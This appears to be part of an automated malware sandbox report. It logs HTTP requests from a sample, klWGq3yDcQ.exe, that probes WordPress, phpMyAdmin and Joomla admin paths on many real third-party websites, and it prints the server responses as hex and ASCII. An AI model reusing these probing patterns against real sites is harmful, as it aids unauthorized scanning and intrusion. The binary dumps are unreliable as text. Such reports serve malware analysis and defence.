                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    121192.168.2.45700976.223.26.96806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.411540985 CET278OUTGET /administrator/?subid1=20231126-1659-31c6-9eaf-33ea7517d5af HTTP/1.1
                                                                                                                                                                                                    Host: ww38.ondania.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656681061 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AXzyiW0Azd+saLIWhDHSyYHSDTdXRY0d33+V2+xgLcsL5JBMok43aPUfTy8p6BpaxryMcSagiAb36C1wRUMovg==
                                                                                                                                                                                                    Accept-CH: viewport-width
                                                                                                                                                                                                    Accept-CH: dpr
                                                                                                                                                                                                    Accept-CH: device-memory
                                                                                                                                                                                                    Accept-CH: rtt
                                                                                                                                                                                                    Accept-CH: downlink
                                                                                                                                                                                                    Accept-CH: ect
                                                                                                                                                                                                    Accept-CH: ua
                                                                                                                                                                                                    Accept-CH: ua-full-version
                                                                                                                                                                                                    Accept-CH: ua-platform
                                                                                                                                                                                                    Accept-CH: ua-platform-version
                                                                                                                                                                                                    Accept-CH: ua-arch
                                                                                                                                                                                                    Accept-CH: ua-model
                                                                                                                                                                                                    Accept-CH: ua-mobile
                                                                                                                                                                                                    Accept-CH-Lifetime: 30
                                                                                                                                                                                                    X-Domain: ondania.com
                                                                                                                                                                                                    X-Subdomain: ww38
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 31 37 34 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 5b 77 da c8 b2 7e 8e 7f 85 c2 ac 6d f0 09 37 81 f1 5d ce c1 c1 8e ed 09 38 b6 f1 05 67 cd c9 12 52 03 32 42 62 24 61 c0 d9 f9 ef e7 ab ee d6 0d 70 32 c9 9e c9 d3 26 09 a0 ee ea ae aa ae 4b 57 55 37 39 78 dd b8 78 d7 ee 7c 3c 56 06 c1 c8 3e 5c 3b a0 0f c5 d4 03 bd a0 9b 5d db 35 86 43 36 d7 32 cd 93 e9 b4 71 d9 39 ff dd 7d 38 1b 3c 19 ad fa e5 f1 d1 d1 65 bd 71 3d ad 4f af eb e7 47 f5 0f 7f 4e 1a 27 c7 ed fb 2b a7 7c ea 95 6b bd 9b 8f db c7 e7 ed ed ed 59 c7 f9 38 ba ea 8e 9b f3 cd a7 e1 ce ef 1d eb d4 19 b6 c6 cc 74 1e 2f ea ad 73 43 bf 6f dc 1b bf 5f 9e b7 ca ce fd ef 0f e7 1f b6 db 86 75 de d8 a9 bb a7 f7 bf ab b5 9d 77 f5 e9 71 bd 7e a9 69 9f eb f7 cf 73 eb ae 5c 7f 36 df f8 fa 87 b3 bb 41 e3 f4 7a de 39 bd 6e b4 cd fb ab 4e d9 ac 56 df dc 56 de cc fa 1f 0c ff 43 ed fc a8 e9 0e 37 ab fa c7 9b 5e 7b be 33 de 3a 1a eb 33 6f de 34 ae f5 be 55 ef 56 b7 de a9 d3 ab 9b a6 fb d4 d7 b4 8c 32 1b d9 8e af 65 06 41 30 de 2b 95 a6 d3 69 71 5a 2d ba 5e bf a4 ee ee ee 96 66 b4 1e 1c 68 cf d6 9d be 96 61 4e 46 89 be d1 7a 31 dd 3c 5c 53 f0 3a 18 b1 40 c7 32 06 e3 02 fb 73 62 3d 69 99 77 ae 13 30 27 28 b4 e7 63 96 51 0c f1 a4 65 02 36 0b 4a 34 ef be 62 0c 74 cf 67 81 36 09 7a 85 9d 4c 29 39 91 a3 8f 98 96 79 b2 d8 74 ec 7a 41 62 f8 d4 32 83 81 66 b2 27 cb 60 05 fe 90 57 2c c7 0a 2c dd 2e f8 86 6e 33 4d cd 2b fe c0 b3 9c 61 21 70 0b 3d 2b d0 1c 37 9a 3b b0 02 9b 1d ba 8e a9 3b 96 5e 34 dc d1 41 49 34 09 1e 7c c3
                                                                                                                                                                                                    Data Ascii: 174b\[w~m7]8gR2Bb$ap2&KWU79xx|<V>\;]5C62q9}8<eq=OGN'+|kY8t/sCo_uwq~is\6Az9nNVVC7^{3:3o4UV2eA0+iqZ-^fhaNFz1<\S:@2sb=iw0'(cQe6J4btg6zL)9ytzAb2f'`W,,.n3M+a!p=+7;;^4AI4|
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656749964 CET1340INData Raw: b3 c6 81 e2 7b 86 96 11 ab d1 77 dd be cd 08 b2 a4 9b 3e 73 7c 56 32 dd 91 6e 39 7e c9 d0 7b c5 47 ff ad de 1d 6b 6a e6 f0 a0 24 06 1f f2 c5 f0 83 b9 cd 94 11 33 2d 5d cb a0 83 61 e1 0e d7 8a ba 0f 76 3f fb 81 ee 95 95 2f 6b af ba ba 31 ec 7b ee
                                                                                                                                                                                                    Data Ascii: {w>s|V2n9~{Gkj$3-]av?/k1{1gYchyXR0`#4~S[(yk)ju<YA4-l=m9}ZHo"R'<<auDX7M<)--lyWz^_h@~
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656764030 CET1340INData Raw: b1 45 ac ad ad bd 3a 10 46 20 92 52 99 a7 1b 45 0a 81 90 30 20 b3 9c f2 cc 50 00 21 27 a4 1d 01 f6 30 42 6a 9a 51 02 a4 de 32 e3 7e d4 9f 74 01 94 c8 55 a5 0a 91 b2 45 d4 c2 d4 84 46 c5 2d 87 6b af 5e bd 3a 40 76 ef b1 9e a8 15 f8 b2 58 a0 77 b1
                                                                                                                                                                                                    Data Ascii: E:F RE0 P!'0BjQ2~tUEF-k^:@vXw0drJ5h@?0tH,'MnCh2WXC/VPV@[a$D7$_I0*Yh3"&j)'8JRU9m[LW2'f9![}
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656776905 CET1340INData Raw: 7e ad 69 e1 57 a4 e5 4a b2 ab c8 e3 bf b0 b7 38 f6 dc c0 85 4d 2a 6f 14 1c 5c 64 f1 11 75 0d 5c 3f 48 3e 8f 41 2a e5 74 68 cb 45 40 42 51 95 b7 f1 30 d9 82 f9 d6 b3 0a ec fa 2d 0a 5e 78 f8 3c d3 7b 4f 9e d6 1a 9d 4d 49 55 5a 95 cb ca c3 e3 09 14
                                                                                                                                                                                                    Data Ascii: ~iWJ8M*o\du\?H>A*thE@BQ0-^x<{OMIUZ<KKg<]@<j};IXP?9\##"@EjJX|MlGs0'1x=3cJQUBpVGPz|gKo_G>e
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656789064 CET1340INData Raw: b9 49 59 cf fa 75 8c 73 2a 7e 9a e5 38 dc 5c 66 97 a7 68 89 2d 32 e6 97 f7 40 9d c1 f0 2f e7 17 a7 d7 ff 19 cb b1 94 51 c6 2e 14 14 71 c9 14 86 c9 cf f4 52 2a b0 10 e2 2c 0a 35 b1 71 f5 60 1c 8b dd a4 57 ff 9c c2 13 c6 75 7a 7b c9 5f 48 9f 29 28
                                                                                                                                                                                                    Data Ascii: IYus*~8\fh-2@/Q.qR*,5q`Wuz{_H)(*4}=%_=Ng8 0xinob>|LK0a?'Llgm_g^!%vq3POuRl# U2Rr>a=5r
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656801939 CET389INData Raw: 0f 89 a9 b6 48 d3 c9 c6 03 0d 77 5f 56 d6 fb c3 d1 08 55 e8 17 87 b8 45 33 0b 8a b8 a5 30 02 75 74 0c 98 4d c5 b9 02 a3 78 4f 06 8e c9 76 21 d0 25 a9 e2 cc dc 77 71 1f c2 76 fb b9 c4 3d 0b c1 73 8c 7b e1 74 75 65 5d 85 b0 25 a7 cb b6 71 78 c7 10
                                                                                                                                                                                                    Data Ascii: Hw_VUE30utMxOv!%wqv=s{tue]%qx]8)00Of/S~-N%H'@mUMzF52@)pR*m.J?z"aHNY.^7w[NNVmjXS7K?)mSZ
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656811953 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.671961069 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    122192.168.2.45663813.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.420272112 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: srmist.edu.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.723372936 CET1340INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                    Server: awselb/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Length: 2051
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    x-amzn-waf-action: captcha
                                                                                                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 75 6d 61 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 41 72 69 61 6c 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 77 73 57 61 66 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 4c 69 73 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 67 6f 6b 75 50 72 6f 70 73 20 3d 20 7b 0a 22 6b 65 79 22 3a 22 41 51 49 44 41 48 6a 63 59 75 2f 47 6a 58 2b 51 6c 67 68 69 63 42 67 51 2f 37 62 46 61 51 5a 2b 6d 35 46 4b 43 4d 44 6e 4f 2b 76 54 62 4e 67 39 36 41 46 34 6e 42 4c 62 4c 41 66 34 42 63 63 58 76 47 4c 61 46 43 62 69 41 41 41 41 66 6a 42 38 42 67 6b 71 68 6b 69 47 39 77 30 42 42 77 61 67 62 7a 42 74 41 67 45 41 4d 47 67 47 43 53 71 47 53 49 62 33 44 51 45 48 41 54 41 65 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 53 34 77 45 51 51 4d 33 6a 7a 69 7a 57 69 33 7a 5a 65 49 65 73 63 49 41 67 45 51 67 44 74 6d 54 4c 35 56 5a 2f 62 41 50 6a 55 5a 47 47 4d 76 6e 48 70 35 75 72 49 71 64 4f 43 6e 43 6b 31 64 57 6b 77 4e 6c 64 67 6b 56 46 75 73 63 57 76 46 2b 76 56 31 2f 72 79 4e 57 4a 6d 45 63 74 4d 56 31 61 70 56 53 55 72 6b 63 39 39 35 30 51 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 69 76 22 3a 22 43 67 41 45 63 41 79 36 30 5a 41 41 41 6b 6b 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 63 6f 6e 74 65 78 74 22 3a 22 45 78 6d 6d 53 38 48 4c 52 79 64 49 45 53 75 6c 43 6f 33 30 47 77 5a 62 68 64 70 46 42 46 75 42 59 48 42 30 70 53 47 6d 4c 63 7a 78 55 4d 66 65 4d 36 47 4b 7a 34 56 51 4f 49 55 79 54 4c 79 78 39 55 56 72 4b 74 4b 62 78 37 4d 37 79 6f 39 54 6a 7a 6d 37 56 2b 48 47 37 54 35 33 70 74 73 70 46 4f 2b 2f 44 61 6f 73 53 47 76 36 44 71 74 4d 68 79 68 38 32 74 6b 68 56 33 39 57 7a 7a 4a 41 36 71 64 6b 70 6d 2b 77 6a 6e 65 50 38 77 52 49 34 50 32 6d 5a 73 37 66 4f 32 58 69 47 47 63 70 76 6f 61 72 70 61 6e 75 4b 74 45 36 58 74 63 58 38 71 6f 43 6f 45 48 59 6c 50 33 4a 2f 72 59 4a 4a 45 42 55 6b 41 58 4b 76 6e 50 44 66 6c 59 32 35 76 68 58 51 2b 70 35 41 51 44 69 66 75 49 36 4f 55 52 79 4e 69 48 73 64 49 65 6e 43 43 6d 63 78 4a 75 71 48 67 51 68 38 4e 65 54 31 43 55 7a 4e 54 53 58 6a 52 2f 79 64 78 44 74 37 79 74 78 4c 54 72 61 52 54 78 31 4b 30 52 43 74 72 2b 57 75 2f 4d 37 57 78 47 35 36 52 64 50 55 4f 33 41 47 58 47 4f 6e 56 42 75 63 35 50 53 56 72 78 64 71 38 6d 69 4d 56 78 33 55 6e 43 5a 55 44 4e 57 78 43 75 49 5a 52 6a 32 41 64 31 62 37 33 53 46 36 74 67 4c 77 62 78 75 33 70 73 3d 22 0a 7d 3b 0a 20 20 20 20 3c
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Human Verification</title> <style> body { font-family: "Arial"; } </style> <script type="text/javascript"> window.awsWafCookieDomainList = []; window.gokuProps = {"key":"AQIDAHjcYu/GjX+QlghicBgQ/7bFaQZ+m5FKCMDnO+vTbNg96AF4nBLbLAf4BccXvGLaFCbiAAAAfjB8BgkqhkiG9w0BBwagbzBtAgEAMGgGCSqGSIb3DQEHATAeBglghkgBZQMEAS4wEQQM3jzizWi3zZeIescIAgEQgDtmTL5VZ/bAPjUZGGMvnHp5urIqdOCnCk1dWkwNldgkVFuscWvF+vV1/ryNWJmEctMV1apVSUrkc9950Q==", "iv":"CgAEcAy60ZAAAkkg", "context":"ExmmS8HLRydIESulCo30GwZbhdpFBFuBYHB0pSGmLczxUMfeM6GKz4VQOIUyTLyx9UVrKtKbx7M7yo9Tjzm7V+HG7T53ptspFO+/DaosSGv6DqtMhyh82tkhV39WzzJA6qdkpm+wjneP8wRI4P2mZs7fO2XiGGcpvoarpanuKtE6XtcX8qoCoEHYlP3J/rYJJEBUkAXKvnPDflY25vhXQ+p5AQDifuI6OURyNiHsdIenCCmcxJuqHgQh8NeT1CUzNTSXjR/ydxDt7ytxLTraRTx1K0RCtr+Wu/M7WxG56RdPUO3AGXGOnVBuc5PSVrxdq8miMVx3UnCZUDNWxCuIZRj2Ad1b73SF6tgLwbxu3ps="}; <
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.723386049 CET1054INData Raw: 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 33 38 63 39 31 33 66 35 39 64 66 66 2e 32 64 64 32 30 38 30 66 2e 61 70 2d 73 6f 75 74 68 2d 31 2e 74 6f 6b 65 6e 2e 61 77 73 77 61 66 2e 63 6f
                                                                                                                                                                                                    Data Ascii: /script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.token.awswaf.com/38c913f59dff/5b5c81627d9b/f3e3dd915a24/challenge.js"></script> <script src="https://38c913f59dff.2dd2080f.ap-south-1.captcha.awswaf.com/38c913f59dff/5b5c81


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    123192.168.2.457001162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.420530081 CET234OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.538444996 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    124192.168.2.45688935.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.450685024 CET235OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    125192.168.2.45702413.32.208.27806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.450685024 CET235OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.544069052 CET635INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: CloudFront
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://www.perrisesd.org/administrator/
                                                                                                                                                                                                    X-Cache: Redirect from cloudfront
                                                                                                                                                                                                    Via: 1.1 076da3643179565aba2eda873738d6b6.cloudfront.net (CloudFront)
                                                                                                                                                                                                    X-Amz-Cf-Pop: IAD66-C1
                                                                                                                                                                                                    X-Amz-Cf-Id: YGUPPl1H2YU6_tp9fQT_LnntbHJwj8FDGf4ODCtCjKQWRSRSFtIhgA==
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    126192.168.2.456937178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.450992107 CET282OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://rochester-gauges.be/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.620471954 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:03 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    127192.168.2.45687381.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.451168060 CET234OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: awb-apparatebau.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    128192.168.2.45687581.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.451313972 CET227OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656593084 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.57 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.657211065 CET266OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://kappablu.de/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.860496044 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.57 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
